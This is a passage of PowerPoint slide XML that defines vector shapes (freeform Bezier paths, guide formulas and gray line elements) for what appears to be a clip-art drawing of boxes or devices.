                    <a:gd name="T18" fmla="*/ 0 w 731"/>
                    <a:gd name="T19" fmla="*/ 487 h 590"/>
                    <a:gd name="T20" fmla="*/ 0 w 731"/>
                    <a:gd name="T21" fmla="*/ 489 h 590"/>
                    <a:gd name="T22" fmla="*/ 4 w 731"/>
                    <a:gd name="T23" fmla="*/ 488 h 590"/>
                    <a:gd name="T24" fmla="*/ 379 w 731"/>
                    <a:gd name="T25" fmla="*/ 590 h 590"/>
                    <a:gd name="T26" fmla="*/ 731 w 731"/>
                    <a:gd name="T27" fmla="*/ 103 h 5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31" h="590">
                      <a:moveTo>
                        <a:pt x="731" y="103"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="352" y="0"/>
                        <a:pt x="352" y="0"/>
                        <a:pt x="352" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="352" y="2"/>
                        <a:pt x="352" y="2"/>
                        <a:pt x="352" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="344" y="0"/>
                        <a:pt x="335" y="0"/>
                        <a:pt x="325" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="325" y="3"/>
                        <a:pt x="59" y="80"/>
                        <a:pt x="57" y="80"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="80"/>
                        <a:pt x="56" y="80"/>
                        <a:pt x="56" y="80"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="89"/>
                        <a:pt x="0" y="122"/>
                        <a:pt x="0" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="487"/>
                        <a:pt x="0" y="487"/>
                        <a:pt x="0" y="487"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="487"/>
                        <a:pt x="0" y="487"/>
                        <a:pt x="0" y="487"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="487"/>
                        <a:pt x="0" y="487"/>
                        <a:pt x="0" y="487"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="489"/>
                        <a:pt x="0" y="489"/>
                        <a:pt x="0" y="489"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="488"/>
                        <a:pt x="4" y="488"/>
                        <a:pt x="4" y="488"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="379" y="590"/>
                        <a:pt x="379" y="590"/>
                        <a:pt x="379" y="590"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="731" y="103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Freeform 917"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="7219" y="904"/>
                  <a:ext cx="436" cy="566"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 382 w 382"/>
                    <a:gd name="T1" fmla="*/ 50 h 495"/>
                    <a:gd name="T2" fmla="*/ 325 w 382"/>
                    <a:gd name="T3" fmla="*/ 9 h 495"/>
                    <a:gd name="T4" fmla="*/ 57 w 382"/>
                    <a:gd name="T5" fmla="*/ 86 h 495"/>
                    <a:gd name="T6" fmla="*/ 56 w 382"/>
                    <a:gd name="T7" fmla="*/ 86 h 495"/>
                    <a:gd name="T8" fmla="*/ 0 w 382"/>
                    <a:gd name="T9" fmla="*/ 160 h 495"/>
                    <a:gd name="T10" fmla="*/ 0 w 382"/>
                    <a:gd name="T11" fmla="*/ 495 h 495"/>
                    <a:gd name="T12" fmla="*/ 381 w 382"/>
                    <a:gd name="T13" fmla="*/ 393 h 495"/>
                    <a:gd name="T14" fmla="*/ 382 w 382"/>
                    <a:gd name="T15" fmla="*/ 323 h 495"/>
                    <a:gd name="T16" fmla="*/ 382 w 382"/>
                    <a:gd name="T17" fmla="*/ 50 h 4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82" h="495">
                      <a:moveTo>
                        <a:pt x="382" y="50"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="382" y="18"/>
                        <a:pt x="356" y="0"/>
                        <a:pt x="325" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="325" y="9"/>
                        <a:pt x="59" y="86"/>
                        <a:pt x="57" y="86"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="86"/>
                        <a:pt x="56" y="86"/>
                        <a:pt x="56" y="86"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="95"/>
                        <a:pt x="0" y="128"/>
                        <a:pt x="0" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="495"/>
                        <a:pt x="0" y="495"/>
                        <a:pt x="0" y="495"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="381" y="393"/>
                        <a:pt x="381" y="393"/>
                        <a:pt x="381" y="393"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="381" y="393"/>
                        <a:pt x="382" y="325"/>
                        <a:pt x="382" y="323"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="382" y="5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918"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="7254" y="972"/>
                  <a:ext cx="371" cy="469"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 325 w 325"/>
                    <a:gd name="T1" fmla="*/ 275 h 411"/>
                    <a:gd name="T2" fmla="*/ 277 w 325"/>
                    <a:gd name="T3" fmla="*/ 337 h 411"/>
                    <a:gd name="T4" fmla="*/ 48 w 325"/>
                    <a:gd name="T5" fmla="*/ 403 h 411"/>
                    <a:gd name="T6" fmla="*/ 0 w 325"/>
                    <a:gd name="T7" fmla="*/ 369 h 411"/>
                    <a:gd name="T8" fmla="*/ 0 w 325"/>
                    <a:gd name="T9" fmla="*/ 136 h 411"/>
                    <a:gd name="T10" fmla="*/ 48 w 325"/>
                    <a:gd name="T11" fmla="*/ 74 h 411"/>
                    <a:gd name="T12" fmla="*/ 277 w 325"/>
                    <a:gd name="T13" fmla="*/ 8 h 411"/>
                    <a:gd name="T14" fmla="*/ 325 w 325"/>
                    <a:gd name="T15" fmla="*/ 42 h 411"/>
                    <a:gd name="T16" fmla="*/ 325 w 325"/>
                    <a:gd name="T17" fmla="*/ 275 h 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25" h="411">
                      <a:moveTo>
                        <a:pt x="325" y="275"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="325" y="302"/>
                        <a:pt x="303" y="330"/>
                        <a:pt x="277" y="337"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="403"/>
                        <a:pt x="48" y="403"/>
                        <a:pt x="48" y="403"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="411"/>
                        <a:pt x="0" y="395"/>
                        <a:pt x="0" y="369"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="136"/>
                        <a:pt x="0" y="136"/>
                        <a:pt x="0" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="109"/>
                        <a:pt x="21" y="81"/>
                        <a:pt x="48" y="74"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="277" y="8"/>
                        <a:pt x="277" y="8"/>
                        <a:pt x="277" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="303" y="0"/>
                        <a:pt x="325" y="15"/>
                        <a:pt x="325" y="42"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="325" y="275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Line 919"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="7532" y="992"/>
                  <a:ext cx="0" cy="376"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="12700">
                  <a:solidFill>
                    <a:srgbClr val="C0C0C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4" name="Line 920"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="7439" y="1019"/>
                  <a:ext cx="0" cy="374"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="12700">
                  <a:solidFill>
                    <a:srgbClr val="C0C0C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5" name="Line 921"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="7347" y="1044"/>
                  <a:ext cx="0" cy="374"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="12700">
                  <a:solidFill>
                    <a:srgbClr val="C0C0C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6" name="Line 922"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1" flipV="1">
                  <a:off x="6851" y="886"/>
                  <a:ext cx="433" cy="117"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="6350">
                  <a:solidFill>
                    <a:srgbClr val="0C080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7" name="Freeform 923"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6737" y="1224"/>
                  <a:ext cx="83" cy="138"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 173"/>
                    <a:gd name="T1" fmla="*/ 244 h 286"/>
                    <a:gd name="T2" fmla="*/ 173 w 173"/>
                    <a:gd name="T3" fmla="*/ 286 h 286"/>
                    <a:gd name="T4" fmla="*/ 173 w 173"/>
                    <a:gd name="T5" fmla="*/ 24 h 286"/>
                    <a:gd name="T6" fmla="*/ 0 w 173"/>
                    <a:gd name="T7" fmla="*/ 0 h 286"/>
                    <a:gd name="T8" fmla="*/ 0 w 173"/>
                    <a:gd name="T9" fmla="*/ 244 h 2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3" h="286">
                      <a:moveTo>
                        <a:pt x="0" y="244"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="173" y="286"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="24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8" name="Freeform 924"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6483" y="1224"/>
                  <a:ext cx="254" cy="283"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 76 w 524"/>
                    <a:gd name="T1" fmla="*/ 586 h 586"/>
                    <a:gd name="T2" fmla="*/ 524 w 524"/>
                    <a:gd name="T3" fmla="*/ 466 h 586"/>
                    <a:gd name="T4" fmla="*/ 524 w 524"/>
                    <a:gd name="T5" fmla="*/ 0 h 586"/>
                    <a:gd name="T6" fmla="*/ 0 w 524"/>
                    <a:gd name="T7" fmla="*/ 206 h 586"/>
                    <a:gd name="T8" fmla="*/ 76 w 524"/>
                    <a:gd name="T9" fmla="*/ 586 h 5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24" h="586">
                      <a:moveTo>
                        <a:pt x="76" y="586"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="524" y="466"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="524" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="206"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="76" y="58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9" name="Freeform 925"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6993" y="1345"/>
                  <a:ext cx="236" cy="183"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 190 w 207"/>
                    <a:gd name="T1" fmla="*/ 0 h 160"/>
                    <a:gd name="T2" fmla="*/ 0 w 207"/>
                    <a:gd name="T3" fmla="*/ 51 h 160"/>
                    <a:gd name="T4" fmla="*/ 8 w 207"/>
                    <a:gd name="T5" fmla="*/ 160 h 160"/>
                    <a:gd name="T6" fmla="*/ 198 w 207"/>
                    <a:gd name="T7" fmla="*/ 109 h 160"/>
                    <a:gd name="T8" fmla="*/ 190 w 207"/>
                    <a:gd name="T9" fmla="*/ 0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7" h="160">
                      <a:moveTo>
                        <a:pt x="190" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="51"/>
                        <a:pt x="0" y="51"/>
                        <a:pt x="0" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="160"/>
                        <a:pt x="8" y="160"/>
                        <a:pt x="8" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="198" y="109"/>
                        <a:pt x="198" y="109"/>
                        <a:pt x="198" y="109"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="207" y="78"/>
                        <a:pt x="195" y="4"/>
                        <a:pt x="19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40" name="Freeform 926"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6861" y="1231"/>
                  <a:ext cx="348" cy="172"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 191 w 305"/>
                    <a:gd name="T1" fmla="*/ 0 h 151"/>
                    <a:gd name="T2" fmla="*/ 0 w 305"/>
                    <a:gd name="T3" fmla="*/ 51 h 151"/>
                    <a:gd name="T4" fmla="*/ 115 w 305"/>
                    <a:gd name="T5" fmla="*/ 151 h 151"/>
                    <a:gd name="T6" fmla="*/ 305 w 305"/>
                    <a:gd name="T7" fmla="*/ 100 h 151"/>
                    <a:gd name="T8" fmla="*/ 191 w 305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5" h="151">
                      <a:moveTo>
                        <a:pt x="191" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="51"/>
                        <a:pt x="0" y="51"/>
                        <a:pt x="0" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="115" y="151"/>
                        <a:pt x="115" y="151"/>
                        <a:pt x="115" y="151"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="305" y="100"/>
                        <a:pt x="305" y="100"/>
                        <a:pt x="305" y="100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="297" y="91"/>
                        <a:pt x="209" y="7"/>
                        <a:pt x="191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41" name="Freeform 927"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6620" y="1172"/>
                  <a:ext cx="459" cy="117"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 191 w 402"/>
                    <a:gd name="T1" fmla="*/ 0 h 103"/>
                    <a:gd name="T2" fmla="*/ 0 w 402"/>
                    <a:gd name="T3" fmla="*/ 51 h 103"/>
                    <a:gd name="T4" fmla="*/ 211 w 402"/>
                    <a:gd name="T5" fmla="*/ 103 h 103"/>
                    <a:gd name="T6" fmla="*/ 402 w 402"/>
                    <a:gd name="T7" fmla="*/ 52 h 103"/>
                    <a:gd name="T8" fmla="*/ 191 w 402"/>
                    <a:gd name="T9" fmla="*/ 0 h 1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2" h="103">
                      <a:moveTo>
                        <a:pt x="191" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="188" y="0"/>
                        <a:pt x="0" y="51"/>
                        <a:pt x="0" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="211" y="103"/>
                        <a:pt x="211" y="103"/>
                        <a:pt x="211" y="103"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="402" y="52"/>
                        <a:pt x="402" y="52"/>
                        <a:pt x="402" y="52"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="384" y="45"/>
                        <a:pt x="213" y="0"/>
                        <a:pt x="191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42" name="Freeform 928"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6786" y="972"/>
                  <a:ext cx="433" cy="115"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 895"/>
                    <a:gd name="T1" fmla="*/ 0 h 239"/>
                    <a:gd name="T2" fmla="*/ 895 w 895"/>
                    <a:gd name="T3" fmla="*/ 239 h 239"/>
                    <a:gd name="T4" fmla="*/ 0 w 895"/>
                    <a:gd name="T5" fmla="*/ 0 h 2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895" h="239">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="895" y="23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43" name="Line 929"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6786" y="972"/>
                  <a:ext cx="433" cy="115"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="6350">
                  <a:solidFill>
                    <a:srgbClr val="0C080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44" name="Freeform 930"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6968" y="1295"/>
                  <a:ext cx="905" cy="342"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 793"/>
                    <a:gd name="T1" fmla="*/ 291 h 299"/>
                    <a:gd name="T2" fmla="*/ 86 w 793"/>
                    <a:gd name="T3" fmla="*/ 284 h 299"/>
                    <a:gd name="T4" fmla="*/ 744 w 793"/>
                    <a:gd name="T5" fmla="*/ 107 h 299"/>
                    <a:gd name="T6" fmla="*/ 791 w 793"/>
                    <a:gd name="T7" fmla="*/ 95 h 299"/>
                    <a:gd name="T8" fmla="*/ 791 w 793"/>
                    <a:gd name="T9" fmla="*/ 0 h 299"/>
                    <a:gd name="T10" fmla="*/ 30 w 793"/>
                    <a:gd name="T11" fmla="*/ 204 h 299"/>
                    <a:gd name="T12" fmla="*/ 0 w 793"/>
                    <a:gd name="T13" fmla="*/ 291 h 2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3" h="299">
                      <a:moveTo>
                        <a:pt x="0" y="291"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="50" y="299"/>
                        <a:pt x="66" y="290"/>
                        <a:pt x="86" y="284"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="106" y="279"/>
                        <a:pt x="719" y="114"/>
                        <a:pt x="744" y="107"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="765" y="102"/>
                        <a:pt x="791" y="95"/>
                        <a:pt x="791" y="95"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="793" y="81"/>
                        <a:pt x="791" y="7"/>
                        <a:pt x="791" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="204"/>
                        <a:pt x="30" y="204"/>
                        <a:pt x="30" y="204"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="29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931"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6913" y="1504"/>
                  <a:ext cx="88" cy="123"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 78"/>
                    <a:gd name="T1" fmla="*/ 0 h 108"/>
                    <a:gd name="T2" fmla="*/ 0 w 78"/>
                    <a:gd name="T3" fmla="*/ 95 h 108"/>
                    <a:gd name="T4" fmla="*/ 48 w 78"/>
                    <a:gd name="T5" fmla="*/ 108 h 108"/>
                    <a:gd name="T6" fmla="*/ 78 w 78"/>
                    <a:gd name="T7" fmla="*/ 21 h 108"/>
                    <a:gd name="T8" fmla="*/ 0 w 78"/>
                    <a:gd name="T9" fmla="*/ 0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" h="108">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="95"/>
                        <a:pt x="0" y="95"/>
                        <a:pt x="0" y="95"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="108"/>
                        <a:pt x="48" y="108"/>
                        <a:pt x="48" y="108"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="95"/>
                        <a:pt x="74" y="37"/>
                        <a:pt x="78" y="2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932"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6685" y="452"/>
                  <a:ext cx="656" cy="478"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1356"/>
                    <a:gd name="T1" fmla="*/ 987 h 987"/>
                    <a:gd name="T2" fmla="*/ 0 w 1356"/>
                    <a:gd name="T3" fmla="*/ 363 h 987"/>
                    <a:gd name="T4" fmla="*/ 711 w 1356"/>
                    <a:gd name="T5" fmla="*/ 174 h 987"/>
                    <a:gd name="T6" fmla="*/ 1356 w 1356"/>
                    <a:gd name="T7" fmla="*/ 0 h 987"/>
                    <a:gd name="T8" fmla="*/ 1356 w 1356"/>
                    <a:gd name="T9" fmla="*/ 626 h 987"/>
                    <a:gd name="T10" fmla="*/ 711 w 1356"/>
                    <a:gd name="T11" fmla="*/ 796 h 987"/>
                    <a:gd name="T12" fmla="*/ 0 w 1356"/>
                    <a:gd name="T13" fmla="*/ 987 h 9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56" h="987">
                      <a:moveTo>
                        <a:pt x="0" y="987"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="363"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="711" y="174"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1356" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1356" y="626"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="711" y="796"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="98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933"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="7013" y="540"/>
                  <a:ext cx="0" cy="302"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 624 h 624"/>
                    <a:gd name="T1" fmla="*/ 0 h 624"/>
                    <a:gd name="T2" fmla="*/ 624 h 62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624">
                      <a:moveTo>
                        <a:pt x="0" y="624"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="62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Freeform 934"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6685" y="628"/>
                  <a:ext cx="0" cy="301"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 h 622"/>
                    <a:gd name="T1" fmla="*/ 622 h 622"/>
                    <a:gd name="T2" fmla="*/ 0 h 62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622">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="6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Freeform 935"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="7341" y="452"/>
                  <a:ext cx="0" cy="302"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 623 h 623"/>
                    <a:gd name="T1" fmla="*/ 0 h 623"/>
                    <a:gd name="T2" fmla="*/ 623 h 623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623">
                      <a:moveTo>
                        <a:pt x="0" y="623"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="623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Freeform 936"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6253" y="285"/>
                  <a:ext cx="1054" cy="261"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 923 w 923"/>
                    <a:gd name="T1" fmla="*/ 104 h 228"/>
                    <a:gd name="T2" fmla="*/ 544 w 923"/>
                    <a:gd name="T3" fmla="*/ 3 h 228"/>
                    <a:gd name="T4" fmla="*/ 544 w 923"/>
                    <a:gd name="T5" fmla="*/ 2 h 228"/>
                    <a:gd name="T6" fmla="*/ 544 w 923"/>
                    <a:gd name="T7" fmla="*/ 2 h 228"/>
                    <a:gd name="T8" fmla="*/ 544 w 923"/>
                    <a:gd name="T9" fmla="*/ 2 h 228"/>
                    <a:gd name="T10" fmla="*/ 517 w 923"/>
                    <a:gd name="T11" fmla="*/ 3 h 228"/>
                    <a:gd name="T12" fmla="*/ 57 w 923"/>
                    <a:gd name="T13" fmla="*/ 125 h 228"/>
                    <a:gd name="T14" fmla="*/ 56 w 923"/>
                    <a:gd name="T15" fmla="*/ 125 h 228"/>
                    <a:gd name="T16" fmla="*/ 0 w 923"/>
                    <a:gd name="T17" fmla="*/ 198 h 228"/>
                    <a:gd name="T18" fmla="*/ 165 w 923"/>
                    <a:gd name="T19" fmla="*/ 154 h 228"/>
                    <a:gd name="T20" fmla="*/ 439 w 923"/>
                    <a:gd name="T21" fmla="*/ 228 h 228"/>
                    <a:gd name="T22" fmla="*/ 923 w 923"/>
                    <a:gd name="T23" fmla="*/ 104 h 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23" h="228">
                      <a:moveTo>
                        <a:pt x="923" y="104"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="544" y="3"/>
                        <a:pt x="544" y="3"/>
                        <a:pt x="544" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="544" y="3"/>
                        <a:pt x="544" y="3"/>
                        <a:pt x="544" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="544" y="2"/>
                        <a:pt x="544" y="2"/>
                        <a:pt x="544" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="544" y="2"/>
                        <a:pt x="544" y="2"/>
                        <a:pt x="544" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="536" y="0"/>
                        <a:pt x="527" y="1"/>
                        <a:pt x="517" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="517" y="3"/>
                        <a:pt x="58" y="124"/>
                        <a:pt x="57" y="125"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="125"/>
                        <a:pt x="56" y="125"/>
                        <a:pt x="56" y="125"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="134"/>
                        <a:pt x="0" y="167"/>
                        <a:pt x="0" y="198"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="154"/>
                        <a:pt x="165" y="154"/>
                        <a:pt x="165" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="439" y="228"/>
                        <a:pt x="439" y="228"/>
                        <a:pt x="439" y="228"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="923" y="10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 937"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
